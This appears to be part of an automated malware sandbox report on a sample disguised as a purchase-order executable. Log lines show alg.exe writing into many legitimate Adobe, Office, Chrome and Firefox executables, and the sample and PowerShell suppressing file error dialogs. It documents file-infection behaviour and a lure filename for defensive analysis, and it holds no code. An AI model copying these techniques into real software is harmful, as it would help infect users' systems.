Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 1576448
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149964
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149888
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 574636
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4318208
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891724
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891648
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 1700540
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4318208
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891724
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891648
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 1700540
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1404928
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978444
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978368
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 633260
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1199616
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773132
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773056
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 513116
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
